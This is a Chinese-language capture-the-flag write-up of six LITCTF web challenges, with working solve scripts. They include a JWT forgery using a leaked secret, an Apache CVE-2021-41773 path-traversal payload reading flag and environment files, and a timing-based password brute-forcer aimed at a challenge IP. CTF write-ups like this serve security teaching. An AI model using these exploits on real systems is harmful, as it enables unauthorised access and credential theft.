目录

anti-inspect 

jwt-1

jwt-2

traversed

kirbytime

scrainbow

---

anti-inspect 

因为一直while true，网页会卡死无法访问

const flag = "LITCTF{your_%cfOund_teh_fI@g_94932}";console.log(flag,"background-color: darkblue; color: white; font-style: italic; border: 5px solid hotpink; font-size: 2em;");

直接console里打印出flag，注意谷歌浏览器不行，这里我用的是火狐

jwt-1

注册改jwt

爆密钥 

改jwt拿flag

jwt-2

直接给了源码，泄露了密钥

附件是ts写的，破解脚本也拿ts写就是

exp:

const crypto = require('crypto');
const axios = require('axios');const url = 'http://litctf.org:31777/flag';
const jwtSecret = 'xook';// JWT header
const header = Buffer.from(JSON.stringify({ alg: 'HS256', typ: 'JWT' }), 'utf8').toString('base64').replace(/=/g, '');// 伪造的JWT payload
const payload = Buffer.from(JSON.stringify({ name: 'aad', admin: true }), 'utf8').toString('base64').replace(/=/g, '');// 生成伪造的JWT签名
const data = `${header}.${payload}`;
const signature = crypto.createHmac('sha256', jwtSecret).update(data).digest('base64').replace(/=/g, '');// 生成伪造的JWT token
const forgedToken = `${data}.${signature}`;// 设置cookie并发送请求
axios.get(url, { headers: { Cookie: `token=${forgedToken}` } }).then(response => {console.log(response.data);}).catch(error => {if (error.response) {console.error(error.response.data);} else {console.error(error.message);}});

traversed

dirsearch扫出来信息泄露

打的是CVE-2021-41773任意文件读取Apache HTTP Server路径穿越漏洞（CVE-2021-41773、CVE-2021-42013）复现 | chaser's Blog

读当前目录下flag.txt即可

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/proc/self/cwd/flag.txt

或者先读环境变量/proc/1/environ得知pwd为/app

再读/app/flag.txt

kirbytime

写脚本暴力破解密码

py脚本

import requests
import string
import time# 目标 URL
url = 'http://34.31.154.223:50350/'  # 修改为实际的 URL# 扩展字符集（包括小写字母、大写字母、数字和常见特殊符号）
charset = string.ascii_letters + string.digits + "!@#$%^&*()-=_+[]{}|;:,.<>/?~"# 密码长度
password_length = 7# 初始猜测密码
known_password = ['a'] * password_length  # 初始密码设为 'aaaaaaa'def check_password(password):"""检查密码并返回响应时间"""start_time = time.time()response = requests.post(url, data={'password': password})end_time = time.time()response_time = end_time - start_timeprint(f"Trying password: {password}, Response Time: {response_time:.2f}s")return response_timedef find_password():for pos in range(password_length):print(f"Finding character for position {pos}...")for char in charset:# 尝试将当前位置设置为当前字符known_password[pos] = charcurrent_guess = ''.join(known_password)response_time = check_password(current_guess)# 动态计算阈值，根据字符位置动态设置threshold = 1.2 + pos * 1.0  # 例：阈值动态增加，可根据实际情况调整print(f"Response Time for {char} at position {pos}: {response_time:.2f}s, Threshold: {threshold:.2f}s")if response_time > threshold:print(f"Character at position {pos} fixed as: {char}")breakelse:# 如果没有找到合适的字符，重置当前位置并尝试其他字符known_password[pos] = 'a'print(f"Failed to fix character at position {pos}")print(f"Known password so far: {''.join(known_password)}")return ''.join(known_password)# 开始破解
if __name__ == '__main__':start_time = time.time()found_password = find_password()end_time = time.time()elapsed_time = end_time - start_timeif found_password:print(f"Final password: {found_password}")print(f"Time taken: {elapsed_time:.2f} seconds")# 使用找到的密码进行登录response = requests.post(url, data={'password': found_password})if response.status_code == 200:print("Login successful!")print("Response from server:")print(response.text)else:print("Login failed.")else:print("Password not found.")

爆出来密码是kBySlaY

 直接LITCTF{}包裹密码就是flag

 

scrainbow

纯脚本题，写脚本通了游戏即可

import requestsheaders = {'Accept': '*/*','Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6','Connection': 'keep-alive','Referer': 'http://litctf.org:31780/','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0'
}data = requests.get('http://litctf.org:31780/data', headers=headers, verify=False).json()def rgb2hsl(hex: str) -> tuple[float, float, float]:hex = hex.lstrip('#')r, g, b = int(hex[:2], 16), int(hex[2:4], 16), int(hex[4:], 16)r, g, b = r / 255.0, g / 255.0, b / 255.0mx = max(r, g, b)mn = min(r, g, b)df = mx-mnif mx == mn:h = 0elif mx == r:h = (60 * ((g-b)/df) + 360) % 360elif mx == g:h = (60 * ((b-r)/df) + 120) % 360elif mx == b:h = (60 * ((r-g)/df) + 240) % 360if mx == 0:s = 0else:s = df/mxl = (mx+mn)/2return h, s, lcolors_map: dict[float, list[int]] = {}
for i, color in enumerate(data):h, s, l = rgb2hsl(color)if h not in colors_map:colors_map[h] = []colors_map[h].append(i)colors = [p for h, p in sorted(colors_map.items(), key=lambda x: x[0], reverse=False)]target = []
for i in range(100):for j in range(100):target.append(colors[i+j].pop())# for i in range(len(data)):
#     print(f"data[{i}] = '{data[target[i]]}';")# exit()moves = []
current = [i for i in range(len(data))]for i in range(len(target)):if current[i] == target[i]:continuea, b = i, current.index(target[i])moves.append((a, b))current[a], current[b] = current[b], current[a]# for move in moves:# print(f"temp = data[{move[0]}]; data[{move[0]}] = data[{move[1]}]; data[{move[1]}] = temp;")response = requests.post('http://litctf.org:31780/test', headers=headers, json={'data': moves}, verify=False)print(response.text)